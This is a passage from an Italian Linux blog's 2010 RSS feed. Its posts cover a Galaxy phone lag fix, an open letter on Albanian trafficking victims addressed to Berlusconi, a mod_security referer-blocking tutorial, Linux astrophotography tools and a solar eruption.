style="text-align: left;">Il tweak è relativamente semplice, ed usa il vecchio concetto di &#8220;swap&#8221; anche se sotto un altra chiave di lettura. Lanciando il fix viene creata una partizione EXT2 sulla memoria interna del telefono, all&#8217;interno del filesystem RFS presente di default, con una dimensione dei blocchi di 4kbyte. Cosi facendo si va a creare un buffer tra il sistema operativo android e il &#8220;<em>vero</em>&#8221; filesystem su cui sono presenti fisicamente i dati, riducendo quindi il numero di I/O necessari per tutte le operazioni, proprio perchè viene sfruttato il buffer del filesystem di tipo EXT2.</p><p
style="text-align: left;">L&#8217;unico difetto è che per come sono allo stato attuale le cose, lo spazio disponibile per i dati delle applicazioni si dimezza da 2GB a 1 solo. Ma ad essere sinceri 1GB per i dati delle applicazioni sono più che sufficienti, soprattutto quando si parla di far letteralmente schizzare le prestazioni del proprio telefono.</p><p
style="text-align: left;">Secondo gli sviluppatori i pregi sono:</p><ol><li>Non richiede una SD esterna [<em>il fix</em>]</li><li>Si può togliere e rimettere la SD esterna dal telefono senza che le applicazioni vadano in crash</li><li>Ovviamente più velocità, come si vede dallo screenshot qui sopra</li><li>Miglior gestione della batteria, non richiedendo una SDcard esterna perennemente attiva la capacità della batteria viene consumata meno in fretta.</li></ol><p>Il fix funziona sia su rom Eclair (2.1, quella stock) che su Froyo (2.2), l&#8217;importante è <strong>che siano rootate</strong>, ed abbiano busybox installato (almeno versione 1.17.1).</p><p>Lo script è un batch quindi o ci si modifica lo script, semplice da leggere a detta degli sviluppatori, per farlo girare su linux oppure ci si procura una macchina windows per poterlo lanciare. Analogamente all&#8217;operazione di fix c&#8217;è anche quella di un-fix, ossia si può far tornare il telefono alle condizioni originali, basta lanciare lo script <em>unlagfixme.bat </em></p><h3><em>Problemi noti</em></h3><ul><li>Se non si ha almeno 1GB di spazio libero dentro la partizione /data il fix non riuscirà ad applicarsi con successo</li><li>Se non si ha una versione di busybox che abbia al suo interno il comando mkfs.ext2 non si potrà creare appunto la partizione, fallendo la procedura.</li><li>Il fix non funzionerà se si ha già installato il mimocan&#8217;s fix, istruzioni su come rimuoverlo <a
href="http://forum.xda-developers.com/showpost.php?p=7578137&amp;postcount=85" target="_blank">qui</a></li><li>Se la procedura fallisce con un &#8220;<em>permission denied</em>&#8221; significa che non si ha la modalità usb-debug attiva o non sono installati correttamente i driver usb [<em>quest'ultimo problema riguarda windows perchè su linux fino adesso non sono necessari driver per android</em>]</li></ul> <script src="http://feeds.feedburner.com/~s/IlPortalinux?i=http://www.ilportalinux.it/risolti-problemi-di-lag-sul-galaxy-con-risultati-disarmanti" type="text/javascript" charset="utf-8"></script> <img src="http://feeds.feedburner.com/~r/IlPortalinux/~4/q3RSkgi7UbI" height="1" width="1"/>]]></content:encoded> <wfw:commentRss>http://www.ilportalinux.it/risolti-problemi-di-lag-sul-galaxy-con-risultati-disarmanti/feed/</wfw:commentRss> <slash:comments>5</slash:comments> <feedburner:origLink>http://www.ilportalinux.it/risolti-problemi-di-lag-sul-galaxy-con-risultati-disarmanti</feedburner:origLink></item> <item><title>Elvira Dones, lettera aperta a Silvio Berlusconi</title><link>http://feedproxy.google.com/~r/IlPortalinux/~3/GRt2SBLSsQ0/elvira-dones-lettera-aperta-silvio-berlusconi</link> <comments>http://www.ilportalinux.it/elvira-dones-lettera-aperta-silvio-berlusconi#comments</comments> <pubDate>Tue, 10 Aug 2010 07:09:48 +0000</pubDate> <dc:creator>M0rF3uS</dc:creator> <category><![CDATA[Cervello a ruota libera]]></category> <category><![CDATA[Di tutto un pò]]></category> <category><![CDATA[donne albanesi]]></category> <category><![CDATA[Elvira Dones]]></category> <category><![CDATA[lettera]]></category> <category><![CDATA[Silvio Berlusconi]]></category><guid isPermaLink="false">http://www.ilportalinux.it/?p=1970</guid> <description><![CDATA[Mi rifaccio al tumblr dell&#8217;amico Bl@ster. &#8220;Egregio Signor Presidente del Consiglio, le scrivo su un giornale che lei non legge, eppure qualche parola gliela devo, perché venerdì il suo disinvolto senso dello humor ha toccato persone a me molto care: “le belle ragazze albanesi” 2....]]></description> <content:encoded><![CDATA[
<p><a href="http://feedads.g.doubleclick.net/~a/xNYxHt9nC5MnBBF-TMSqSMtQ4Sw/0/da"><img src="http://feedads.g.doubleclick.net/~a/xNYxHt9nC5MnBBF-TMSqSMtQ4Sw/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/xNYxHt9nC5MnBBF-TMSqSMtQ4Sw/1/da"><img src="http://feedads.g.doubleclick.net/~a/xNYxHt9nC5MnBBF-TMSqSMtQ4Sw/1/di" border="0" ismap="true"></img></a></p><p>Mi rifaccio al <a
href="http://dottorblaster.tumblr.com/post/927211414/egregio-signor-presidente-del-consiglio-le" target="_blank">tumblr dell&#8217;amico Bl@ster</a>.</p><p><span
id="more-1970"></span></p><blockquote><p>&#8220;Egregio Signor Presidente del Consiglio,</p><p>le scrivo su un giornale che lei non legge, eppure qualche parola gliela devo, perché venerdì il suo disinvolto senso dello humor ha toccato persone a me molto care: “le belle ragazze albanesi” 2. Mentre il premier del mio paese d’origine, Sali Berisha, confermava l’impegno del suo esecutivo nella lotta agli scafisti, lei ha puntualizzato che “per chi porta belle ragazze possiamo fare un’eccezione.”</p><p>Io quelle “belle ragazze” le ho incontrate, ne ho incontrate a decine, di notte e di giorno, di nascosto dai loro magnaccia, le ho seguite da Garbagnate Milanese fino in Sicilia. Mi hanno raccontato sprazzi delle loro vite violate, strozzate, devastate. A “Stella” i suoi padroni avevano inciso sullo stomaco una parola: puttana. Era una bella ragazza con un difetto: rapita in Albania e trasportata in Italia, si rifiutava di andare sul marciapiede. Dopo un mese di stupri collettivi ad opera di magnaccia albanesi e soci italiani, le toccò piegarsi. Conobbe i marciapiedi del Piemonte, del Lazio, della Liguria, e chissà quanti altri. E’ solo allora  &#8211;  tre anni più tardi  &#8211;  che le incisero la sua professione sulla pancia: così, per gioco o per sfizio.</p><p>Ai tempi era una bella ragazza, sì. Oggi è solo un rifiuto della società, non si innamorerà mai più, non diventerà mai madre e nonna. Quel puttana sulla pancia le ha cancellato ogni barlume di speranza e di fiducia nell’uomo, il massacro dei clienti e dei protettori le ha distrutto l’utero.</p><p>Sulle “belle ragazze” scrissi un romanzo, pubblicato in Italia con il titolo Sole bruciato. Anni più tardi girai un documentario per la tivù svizzera: andai in cerca di un’altra bella ragazza, si chiamava Brunilda, suo padre mi aveva pregato in lacrime di indagare su di lei. Era un padre come tanti altri padri albanesi ai quali erano scomparse le figlie, rapite, mutilate, appese a testa in giù in macellerie dismesse se osavano ribellarsi. Era un padre come lei, Presidente, solo meno fortunato. E ancora oggi il padre di Brunilda non accetta che sua figlia sia morta per sempre, affogata in mare o giustiziata in qualche angolo di periferia. Lui continua a sperare, sogna il miracolo. E’ una storia lunga, Presidente… Ma se sapessi di poter contare sulla sua attenzione, le invierei una copia del mio libro, o le spedirei il documentario, o farei volentieri due chiacchiere con lei. Ma l’avviso, signor Presidente: alle battute rispondo, non le ingoio.</p><p>In nome di ogni Stella, Bianca, Brunilda e delle loro famiglie queste poche righe gliele dovevo. In questi vent’anni di difficile transizione l’Albania s’è inflitta molte sofferenze e molte ferite con le sue stesse mani, ma nel popolo albanese cresce anche la voglia di poter finalmente camminare a spalle dritte e testa alta. L’Albania non ha più pazienza né comprensione per le umiliazioni gratuite. Credo che se lei la smettesse di considerare i drammi umani come materiale per battutacce da bar a tarda ora, non avrebbe che da guadagnarci.&#8221;</p></blockquote><p>Il tutto si rifà all&#8217;ennesima <a
href="http://www.repubblica.it/cronaca/2010/02/12/news/berlusconi_sbarchi-2272819/index.html?ref=search" target="_blank">performance del premier</a> (<em>si, lo scrivo con la minuscola, non si merita questo titolo secondo me.</em>) durante l&#8217;incontro con Berisha, il primo ministro Albanese.</p><p>Questa è la &#8220;<em>persona</em>&#8221; che ci governa, questa è la &#8220;<em>persona</em>&#8221; che ci rappresenta pubblicamente a livello mondiale. Spero che almeno siate contenti voi che l&#8217;avete votato alle scorse elezioni.</p><p>Noi <em>coglioni</em> comunisti preferiamo rimanere coglioni ai vostri occhi piuttosto che dare credito a persone del genere.</p> <script src="http://feeds.feedburner.com/~s/IlPortalinux?i=http://www.ilportalinux.it/elvira-dones-lettera-aperta-silvio-berlusconi" type="text/javascript" charset="utf-8"></script> <img src="http://feeds.feedburner.com/~r/IlPortalinux/~4/GRt2SBLSsQ0" height="1" width="1"/>]]></content:encoded> <wfw:commentRss>http://www.ilportalinux.it/elvira-dones-lettera-aperta-silvio-berlusconi/feed/</wfw:commentRss> <slash:comments>10</slash:comments> <feedburner:origLink>http://www.ilportalinux.it/elvira-dones-lettera-aperta-silvio-berlusconi</feedburner:origLink></item> <item><title>Blocco dei referral link su apache2 con mod security</title><link>http://feedproxy.google.com/~r/IlPortalinux/~3/GvpvbnJg5hA/blocco-dei-referral-link-su-apache2-con-mod-security</link> <comments>http://www.ilportalinux.it/blocco-dei-referral-link-su-apache2-con-mod-security#comments</comments> <pubDate>Fri, 06 Aug 2010 09:34:07 +0000</pubDate> <dc:creator>M0rF3uS</dc:creator> <category><![CDATA[Linux]]></category> <category><![CDATA[Server]]></category> <category><![CDATA[Server Farm Stories]]></category> <category><![CDATA[Web Server]]></category> <category><![CDATA[apache2]]></category> <category><![CDATA[debian]]></category> <category><![CDATA[filtering]]></category> <category><![CDATA[mod_security]]></category> <category><![CDATA[referral]]></category><guid isPermaLink="false">http://www.ilportalinux.it/?p=1963</guid> <description><![CDATA[Dopo tanto tempo ecco a voi un &#8220;tutorial per sysadmin&#8220;, oggi vediamo come bloccare dei potenziali attacchi di tipo indiretto. Cosa significa attacco indiretto? Significa che non c&#8217;è un attacco che parte da un punto preciso e finisce sul nostro server, in un attacco spam...]]></description> <content:encoded><![CDATA[
<p><a href="http://feedads.g.doubleclick.net/~a/GpVHtmrDknC8GvUbqC6FamtiTCk/0/da"><img src="http://feedads.g.doubleclick.net/~a/GpVHtmrDknC8GvUbqC6FamtiTCk/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/GpVHtmrDknC8GvUbqC6FamtiTCk/1/da"><img src="http://feedads.g.doubleclick.net/~a/GpVHtmrDknC8GvUbqC6FamtiTCk/1/di" border="0" ismap="true"></img></a></p><p>Dopo tanto tempo ecco a voi un &#8220;<em>tutorial per sysadmin</em>&#8220;, oggi vediamo come bloccare dei potenziali attacchi di tipo <strong>indiretto</strong>.</p><p><span
id="more-1963"></span>Cosa significa <em>attacco indiretto</em>? Significa che non c&#8217;è un attacco che parte da un punto preciso e finisce sul nostro server, in un attacco spam via referral link chi ti attacca fisicamente, ed inconsapevolmente, sono gli stessi utenti che visitano il tuo sito.</p><p>Vi porto l&#8217;esempio di un attacco che ho dovuto gestire fino a ieri sera. 3 giorni fa poco dopo l&#8217;ora di pranzo mi chiamano segnalando che il sito istituzionale di $cliente non si vede più.</p><p>Questo è un sito grosso, piazzato su un cluster altrettanto grosso, solo le macchine del front end sono 4 e non sono macchine comprate da mediaworld, sono dei mini carro armati.</p><p>Quindi quando mi si dice &#8220;<em>il sito è giù</em>&#8221; rimango alquanto basito, collegandomi sui bilanciatori vedo che in maniera abbastanza randomica l&#8217;apache che fa da reverse proxy non riesce più a contattare la porta 80 di alcune macchine del front end, ed in effetti con un semplice telnet finisco con un timeout.</p><p>Per tagliarla corta, dopo ore ed ore di analisi abbiamo visto che molti errori venivano generati da chiamate GET che avevano come referral link un motore di ricerca di inserzioni online.</p><p>Consultandomi con gli sviluppatori vengo a sapere che l&#8217;url verso cui sono dirette le GET è una landing page di una campagna di affiliazione via banner, lanciata da $cliente, ne consegue quindi che questo motore di ricerca deve essersi iscritto a questa campagna; peccato che visitandolo del banner in questione non ve n&#8217;è traccia.</p><p>Il sospetto è quindi che i furbacchioni abbiano prelevato il codice del banner e l&#8217;abbiano nascosto in qualche maniera nel codice delle pagine, in modo che ad ogni pagina visitata sul motore parta un click &#8220;<em>fasullo</em>&#8221; sul banner. Basta avere un motore di ricerca che fa tante visite ed ecco che automaticamente la truffa si tramuta in attacco.</p><p>Il sito istituzionale di $cliente è gestito da application server java [<em>sigh</em>] i quali dovendo gestire un throughput di GET mastodontico entro breve tempo saturavano la memoria messa a disposizione dalla JVM (Java Virtual Machine) facendo si che le GET si accodassero, mandando successivamente in blocco la porta 80, e quindi rendendo il sito inaccessibile.</p><p>Qui non si può filtrare semplicemente via firewall, perchè come detto prima l&#8217;attacco è indiretto, non parte dai server del motore di ricerca ma sono gli utenti che vengono dirottati sul sito che <em>attaccano</em> il sito stesso.</p><p>L&#8217;unica soluzione è quindi adottare il <strong>mod_security</strong> di apache2 e filtrare le GET in entrata basandosi sul referral link, in modo che le chiamate &#8220;dirottate&#8221; dal motore di ricerca non vengano processate dal web service java e vengano direttamente rimbalzate con errore di tipo 500.</p><p>Una volta su debian bastava installare <strong>libapache2_mod-security</strong> via apt-get, ma su lenny sembra che questi pacchetti non siano più presenti, e quindi bisogna prelevarli tramite il sito ufficiale di mod security [<a
href="http://etc.inittab.org/~agi/debian/libapache-mod-security2/" target="_blank">mirror per i pacchetti debian</a>] ed installarli via &#8220;<em>dpkg -i</em>&#8220;</p><p>Installati i pacchetti è sufficiente creare un file chiamato <em>mod_security </em> dentro <strong>/etc/apache2/conf.d</strong> e scriverci dentro:</p><blockquote><div
id="_mcePaste">&lt;IfModule mod_security.c&gt;</div><div
id="_mcePaste"># mod_security configuration directives</div><div
id="_mcePaste"># &#8230;</div><div
id="_mcePaste"># Turn the filtering engine On or Off</div><div
id="_mcePaste">SecFilterEngine On</div><div></div><div
id="_mcePaste"># Some sane defaults</div><div
id="_mcePaste">#Check if URL characters where encoded</div><div
id="_mcePaste">SecFilterCheckURLEncoding On</div><div></div><div
id="_mcePaste">#Check UTF-8 encoding</div><div
id="_mcePaste">SecFilterCheckUnicodeEncoding Off</div><div></div><div
id="_mcePaste">#Allow 1 byte characters</div><div
id="_mcePaste"># Accept almost all byte values</div><div
id="_mcePaste">SecFilterForceByteRange 0 255</div><div></div><div
id="_mcePaste"># Server masking is optional</div><div
id="_mcePaste"># SecServerSignature &#8220;Microsoft-IIS/0.0&#8243;</div><div
id="_mcePaste">SecAuditEngine RelevantOnly</div><div></div><div
id="_mcePaste"># The name of the audit log file</div><div
id="_mcePaste">SecAuditLog /var/log/apache2/audit_log</div><div></div><div
id="_mcePaste"># You normally won&#8217;t need debug logging</div><div
id="_mcePaste"># Debug level set to a minimum</div><div
id="_mcePaste">SecFilterDebugLog /var/log/apache2/modsec_debug_log</div><div
id="_mcePaste">SecFilterDebugLevel 0</div><div></div><div
id="_mcePaste"># Should mod_security inspect POST payloads</div><div
id="_mcePaste">SecFilterScanPOST On</div><div></div><div
id="_mcePaste"># By default log and deny suspicious requests</div><div
id="_mcePaste"># with HTTP status 500</div><div></div><div
id="_mcePaste">SecFilterDefaultAction &#8220;deny,log,status:500&#8243;</div><div
id="_mcePaste"># Blocco il referral nasone.it</div><div
id="_mcePaste">SecFilterSelective &#8220;HTTP_REFERER&#8221; &#8220;domain.tld&#8221;</div><div
id="_mcePaste">&lt;/IfModule&gt;</div></blockquote><div>Per la lista ed il significato di tutti i parametri vi rimando alla <a
href="http://www.modsecurity.org/documentation/" target="_blank">documentazione ufficiale</a>, quelli che infatti ci interessano per lo scopo di questo articolo sono:</div><div><ol><li><div
id="_mcePaste">SecFilterEngine On: Auto esplicativo, accendiamo o spegnamo il motore di filtering</div></li><li><div
id="_mcePaste">SecFilterCheckURLEncoding On: Controlliamo anche gli url con caratteri codificati all&#8217;interno</div></li><li>SecFilterScanPOST On: controlliamo anche le chiamate fatte con metodo POST</li><li>SecFilterDefaultAction &#8220;deny,log,status:500&#8243;: definiamo se le chiamate che rispettano le regole devono essere loggate, rifiutate o ammesse, e nel primo caso con quale tipo di errore devono essere rimbalzate</li><li>SecFilterSelective &#8220;HTTP_REFERER&#8221; &#8220;domain.tld&#8221;: Scegliamo di usare un filtro selettivo che va ad ispezionare il campo HTTP_REFERRER dell&#8217;header HTTP, e se nel campo è contenuto &#8220;domain.tld&#8221; viene fatto scattare il trigger con l&#8217;azione definita in SecFilterDefaultAction.</li></ol></div><p>Compilato il file salviamolo e riavviamo apache, e da questo momento le chiamate in questione verranno filtrate, potete vedere se il filtro funziona tramite il file di log impostato nella configurazione sopra o più semplicemente vedendo le chiamate che arrivano nei file di accesso al virtual host di apache, vedrete che le GET da questo momento in poi non otterranno più un codice 200 ma 500.</p> <script src="http://feeds.feedburner.com/~s/IlPortalinux?i=http://www.ilportalinux.it/blocco-dei-referral-link-su-apache2-con-mod-security" type="text/javascript" charset="utf-8"></script> <img src="http://feeds.feedburner.com/~r/IlPortalinux/~4/GvpvbnJg5hA" height="1" width="1"/>]]></content:encoded> <wfw:commentRss>http://www.ilportalinux.it/blocco-dei-referral-link-su-apache2-con-mod-security/feed/</wfw:commentRss> <slash:comments>7</slash:comments> <feedburner:origLink>http://www.ilportalinux.it/blocco-dei-referral-link-su-apache2-con-mod-security</feedburner:origLink></item> <item><title>Gestione completa della nostra fotocamera con gtimelapse e darktable</title><link>http://feedproxy.google.com/~r/IlPortalinux/~3/XY_vad73weM/gestione-completa-della-nostra-fotocamera-con-gtimelapse-darktable</link> <comments>http://www.ilportalinux.it/gestione-completa-della-nostra-fotocamera-con-gtimelapse-darktable#comments</comments> <pubDate>Thu, 05 Aug 2010 18:11:31 +0000</pubDate> <dc:creator>M0rF3uS</dc:creator> <category><![CDATA[Astronomia/Astronautica]]></category> <category><![CDATA[Fotografia]]></category> <category><![CDATA[Linux]]></category> <category><![CDATA[canon]]></category> <category><![CDATA[darktable]]></category> <category><![CDATA[fotocamera]]></category> <category><![CDATA[fotografie]]></category> <category><![CDATA[fotoritocco]]></category> <category><![CDATA[gestione]]></category> <category><![CDATA[gtimelapse]]></category> <category><![CDATA[lightroom]]></category> <category><![CDATA[raw]]></category> <category><![CDATA[reflex]]></category> <category><![CDATA[scatto remoto]]></category> <category><![CDATA[shooting]]></category> <category><![CDATA[tether]]></category><guid isPermaLink="false">http://www.ilportalinux.it/?p=1957</guid> <description><![CDATA[Quando uno è appassionato di astronomia e di fotografia, inevitabilmente, finisce con il praticare l&#8217;astrofotografia. Io infatti sto programmando una nottata di astrofotografia, giù in calabria a casa mia, alla caccia del centro della via lattea. E piano piano quindi con mesi di risparmi mi...]]></description> <content:encoded><![CDATA[
<p><a href="http://feedads.g.doubleclick.net/~a/zDzcEHd2S8KFJL8AEjFAMJIFD6o/0/da"><img src="http://feedads.g.doubleclick.net/~a/zDzcEHd2S8KFJL8AEjFAMJIFD6o/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/zDzcEHd2S8KFJL8AEjFAMJIFD6o/1/da"><img src="http://feedads.g.doubleclick.net/~a/zDzcEHd2S8KFJL8AEjFAMJIFD6o/1/di" border="0" ismap="true"></img></a></p><p>Quando uno è appassionato di astronomia e di fotografia, inevitabilmente, finisce con il praticare l&#8217;astrofotografia.</p><p><span
id="more-1957"></span>Io infatti sto programmando una nottata di astrofotografia, giù in calabria a casa mia, alla caccia del<a
href="http://it.wikipedia.org/wiki/Centro_della_Via_Lattea" target="_blank"> centro della via lattea</a>. E piano piano quindi con mesi di risparmi mi sono imbastito l&#8217;attrezzatura necessaria.</p><p>Come fotocamera userò la mia fidatissima Canon 1000d, il parco obiettivi mi copre tutte le focali da 18 a 250 mm, <a
href="http://www.ilportalinux.it/unieuro-regali-da-25-ed-estrazione-di-ricchi-premi" target="_blank">grazie ad unieuro</a> mi sono comprato anche un treppiede hama di discreto livello, l&#8217;unica cosa che mi mancava era lo scatto remoto.</p><p>Per fare foto astronomiche infatti bisogna fare diversi scatti con esposizioni che variano dai 15 secondi a svariati minuti; e stare 15 secondi col ditino sul pulsante per tenere l&#8217;otturatore aperto non è il massimo, sia perchè verrebbero fuori foto vomitevoli per le immagini mosse, e sia perchè effettivamente è stancante.</p><p>La soluzione quindi si chiama tether shooting, o scatto remoto per l&#8217;appunto, le alternative sono due:</p><ol><li>comprare un telecomando da collegare alla fotocamera</li><li>fare tutto col piccì</li></ol><p>Indovinate quale soluzione ho scelto io? <img
src='http://www.ilportalinux.it/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' title="Gestione completa della nostra fotocamera con gtimelapse e darktable Photo" /></p><p>A dir la verità la mia scelta fino a ieri propendeva per la prima soluzione, ma c&#8217;erano troppe variabili <em>pericolose</em> in gioco, perchè ad esempio per catturare la via Lattea bisogna alternare tempi di esposizione a tempi di riposo, quindi per 15/20 secondi avrei dovuto tenere il pulsantino premuto per aprire l&#8217;otturatore, per un altra trentina avrei dovuto rilasciarlo per chiuderlo e far raffreddare il sensore, e cosi via svariate volte. Il rischio di errore è molto alto.</p><p>Ci sono dei telecomandi programmabili, ma costano un troiaio ed io non ho ne la voglia ne la possibilità di investire cosi tanti soldi.</p><p>Sapevo che tramite pc si potevano usare software appositi, la Canon stessa tramite il software in dotazione Digital Photo Professional con le &#8220;EOS Utility&#8221; ti consente di programmare la sequenza degli scatti. Ma purtroppo DPP, come quasi tutti i software, gira solo su windows;</p><p>Ma con una googlata e grazie all&#8217;aiuto della <a
href="http://ff.im/oLtcz" target="_blank">lega nerd</a> sono venuto a conoscenza di due software che sono nativi per linux e che a prima vista sembrano fantastici.</p><p>Il primo si chiama <a
href="http://darktable.sourceforge.net/" target="_blank">Darktable</a> è un software per la gestione e la modifica delle proprie foto, è molto simile ad Adobe LightRoom e consente pure di fare tether shooting, purtroppo però <a
href="http://darktable.sourceforge.net/documentation.shtml" target="_blank">solo con alcune macchine</a> al momento (è una funzione in stato sperimentale), è molto leggero ed è molto potente allo stesso tempo, per me che uso sempre scatti in formato RAW è comodissimo per la modifica dei livelli, del bilanciamento dei bianchi e tutto quello che un software di fotoritocco ti consente di fare.</p><p>Il secondo invece si chiama <a
href="http://ultrawide.wordpress.com/2009/01/27/timelapse-photography-on-linux/" target="_blank">GTimeLapse</a> è un tool scritto in GTK che si appoggia a <em>libgphoto </em> e le <em>WxWidgets</em> per collegarsi via usb alla fotocamera e programmarne gli scatti. L&#8217;ho provato programmando una serie di 20 scatti in varie modalità (1 ogni 5 secondi e 2 ogni 5 secondi), funziona senza battere ciglio, rileva le impostazioni di fuoco della fotocamera (è possibile anche modificarle dal software e far scattare la fotocamera con le impostazioni di fuoco personalizzate) e visualizza al volo gli scatti su schermo, questo però solo se si scatta in jpeg, non ha purtroppo la possibilità di gestire gli scatti effettuati in RAW (che la canon registra in files .CR2).</p><p>Ecco adesso il mio corredo può dirsi completato, per ora, e non vedo l&#8217;ora di fare la notturna con fotocamera, piccì, e la via Lattea che mi guarda dall&#8217;alto <img
src='http://www.ilportalinux.it/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="Gestione completa della nostra fotocamera con gtimelapse e darktable Photo" /></p> <script src="http://feeds.feedburner.com/~s/IlPortalinux?i=http://www.ilportalinux.it/gestione-completa-della-nostra-fotocamera-con-gtimelapse-darktable" type="text/javascript" charset="utf-8"></script> <img src="http://feeds.feedburner.com/~r/IlPortalinux/~4/XY_vad73weM" height="1" width="1"/>]]></content:encoded> <wfw:commentRss>http://www.ilportalinux.it/gestione-completa-della-nostra-fotocamera-con-gtimelapse-darktable/feed/</wfw:commentRss> <slash:comments>7</slash:comments> <feedburner:origLink>http://www.ilportalinux.it/gestione-completa-della-nostra-fotocamera-con-gtimelapse-darktable</feedburner:origLink></item> <item><title>Uh, il sole ha fatto “burp”</title><link>http://feedproxy.google.com/~r/IlPortalinux/~3/cFB7h4udXC4/uh-il-sole-ha-fatto-burp</link> <comments>http://www.ilportalinux.it/uh-il-sole-ha-fatto-burp#comments</comments> <pubDate>Thu, 05 Aug 2010 08:19:51 +0000</pubDate> <dc:creator>M0rF3uS</dc:creator> <category><![CDATA[Astronomia/Astronautica]]></category> <category><![CDATA[News]]></category> <category><![CDATA[Scienza]]></category> <category><![CDATA[cme]]></category> <category><![CDATA[eruzione solare]]></category> <category><![CDATA[espulsione massa coronale]]></category> <category><![CDATA[nasa]]></category> <category><![CDATA[tsunami]]></category><guid isPermaLink="false">http://www.ilportalinux.it/?p=1945</guid> <description><![CDATA[Probabilmente alcuni di voi sapranno che nella notte tra il 3 ed il 4 agosto era prevista un eruzione solare. Come al solito non mancano le sparate di Tiscali Notizie che vaneggia su uno &#8220;tsunami solare&#8220;, da dove abbiano preso questo termine però non si...]]></description> <content:encoded><![CDATA[
<p><a href="http://feedads.g.doubleclick.net/~a/6ZVzyDYRjBK78FMJdO3TGh4KMp8/0/da"><img src="http://feedads.g.doubleclick.net/~a/6ZVzyDYRjBK78FMJdO3TGh4KMp8/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/6ZVzyDYRjBK78FMJdO3TGh4KMp8/1/da"><img src="http://feedads.g.doubleclick.net/~a/6ZVzyDYRjBK78FMJdO3TGh4KMp8/1/di" border="0" ismap="true"></img></a></p><p>Probabilmente alcuni di voi sapranno che nella notte tra il 3 ed il 4 agosto era prevista un eruzione solare.</p><p><span
id="more-1945"></span>Come al solito non mancano le sparate di Tiscali Notizie che vaneggia su uno &#8220;<a
href="http://it.notizie.yahoo.com/53/20100803/ttc-il-sole-sia-sta-svegliando-lo-tsunam-f0c422d.html" target="_blank">tsunami solare</a><em>&#8220;, </em>da dove abbiano preso questo termine però non si sa bene, quello che sappiamo è che Tiscali <a
href="http://www.ilportalinux.it/la-voyager-2-si-e-rotta-e-tiscali-spara-cazzate" target="_blank">non è nuova</a> a questo genere di<em> </em><em>notizie</em></p><p>In realtà c&#8217;è <a
href="http://attivissimo.blogspot.com/2010/08/tsunami-solare-domani.html" target="_blank">ben poco di tsunami</a>, per citare Attivissimo:</p><blockquote><p>Quella di oggi [<em>l'eruzione ndr.</em>] è <em>&#8220;importante&#8221;</em> (<em>&#8220;major&#8221;</em> in originale), ma è un ruttino rispetto alla <em>&#8220;eruzione solare veramente grande&#8221;</em> che potrebbe causare danni.</p></blockquote><p>E siccome a me piace parlare di scienza e non di fantascienza vi allego <a
href="http://www.nasa.gov/topics/solarsystem/sunearthsystem/main/News080210-cme.html" target="_blank">un breve filmato</a> registrato da una delle sonde &#8220;<em>surveyor</em>&#8221; della NASA che, come avrete intuito, questa eruzione se l&#8217;aspettava da tempo, e se fosse stata veramente devastante come si dice avrebbe fatto girare la notizia per correre ai ripari, ma si sa il sensazionalismo <strong>vende </strong>quindi chi se ne frega se c&#8217;è gente che leggendo la parola <em>tsunami</em> si caga in mano.</p><p
style="text-align: center;"><object
width="425" height="355" type="application/x-shockwave-flash" data="http://www.youtube.com/v/lgNwlJxZioI&amp;ap=%2526fmt%3D18"><param
name="movie" value="http://www.youtube.com/v/lgNwlJxZioI&amp;ap=%2526fmt%3D18" />This video was embedded using the YouTuber plugin by <a
href="http://www.roytanck.com">Roy Tanck</a>. Adobe Flash Player is required to view the video.</object></p><p
style="text-align: left;">Ma vediamo un pò di cosa stiamo parlando, quella inquadrata si chiama CME che sta per <em>Coronal Mass Ejection, </em> per gli amici Espulsione di Massa Coronale.</p><p
style="text-align: left;">Quando Attivissimo dice che il Sole ha fatto un ruttino usa una metafora, ma in reatà il sole fa <strong>veramente </strong> un ruttino, la nostra stella infatti brilla come sappiamo a causa delle reazioni di fusione nucleare che avvengono al suo interno, e quindi è come uno stomaco in eterna fase digestiva, ogni tanto l&#8217;attività digestiva (leggasi attività solare) arriva a dei picchi causando, appunto, il ruttino proprio come lo facciamo noi esseri umani.</p><p
style="text-align: left;"><a
href="http://www.ilportalinux.it/wp-content/uploads/2010/08/800px-Polarlicht_2.jpg" rel="lightbox[1945]"><img
class="alignleft size-thumbnail wp-image-1952" title="800px-Polarlicht_2" src="http://www.ilportalinux.it/wp-content/uploads/2010/08/800px-Polarlicht_2-150x150.jpg" alt="Uh, il sole ha fatto burp" width="150" height="150" /></a>La <em>roba</em> che viene espulsa e che noi vediamo di colore bianco è <strong>plasma </strong>costituito principalmente da elettroni e protoni [<em><a
href="http://it.wikipedia.org/wiki/Espulsione_di_massa_coronale">Wikipedia</a></em>], questo plasma viene eiettato anche in direzione della Terra, ma niente paura, il campo magnetico che ci avvolge è capace di sopportare e neutralizzare <em>ruttini </em>anche ben più grossi di questo, anzi è un ottima occasione per chi sta a determinate latitudini del nostro pianeta, di osservare spettacolari <a
href="http://it.wikipedia.org/wiki/Aurora_polare" target="_blank">aurore polari</a> dovute all&#8217;interazione dei protoni e degli elettroni del plasma solare che si scontrano col nostro campo magnetico terrestre.</p><p
style="text-align: left;"><strong>Update: </strong>Andry nei commenti mi segnala <a
href="http://spaceweather.com/aurora/gallery_01aug10.htm" target="_blank">questa gallery su spaceweather</a> con immagini stupende di aurore polari, come potete vedere di eruzioni solari ne abbiamo avute parecchie, e fin&#8217;ora non è successa nessuna tragedia <img
